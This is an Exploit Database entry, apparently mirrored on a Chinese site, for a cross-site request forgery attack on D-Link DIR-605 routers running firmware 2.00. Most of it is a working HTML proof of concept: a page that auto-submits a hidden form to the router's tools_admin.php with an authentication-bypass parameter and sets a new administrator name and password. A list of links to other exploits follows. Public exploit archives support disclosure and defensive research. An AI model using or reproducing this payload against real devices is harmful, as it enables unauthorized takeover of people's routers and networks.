D-Link DIR-605 – Cross-Site Request Forgery

Exploit Database
94 阅读

作者： iqzer0

日期： 2012-03-21
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/18638/

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605

This allows unauthroized access to the device and post injections

<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
 <input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="iqzer0" />
<input type="hidden" name="admin_password1" value="bypass" />
<input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>

last Exploits
D-Link DIR-605 – Cross-Site Request Forgery的更多信息

agXchange ESM – ‘ucquerydetails.jsp’ Cross-Site Scripting：
ZTE F660 – Remote Configuration Download：
Orion Network Performance Monitor 10.1.3 – ‘CustomChart.aspx’ Cross-Site Scripting：
Inteno DG301 – Command Injection：
Seagate BlackArmor NAS sg2000-2000.1331 – Cross-Site Request Forgery：
Online Quiz Maker 1.0 – ‘catid’ SQL Injection：
Seagate Business NAS 2014.00319 – Remote Code Execution：
V-SOL GPON/EPON OLT Platform 2.03 – Cross-Site Request Forgery：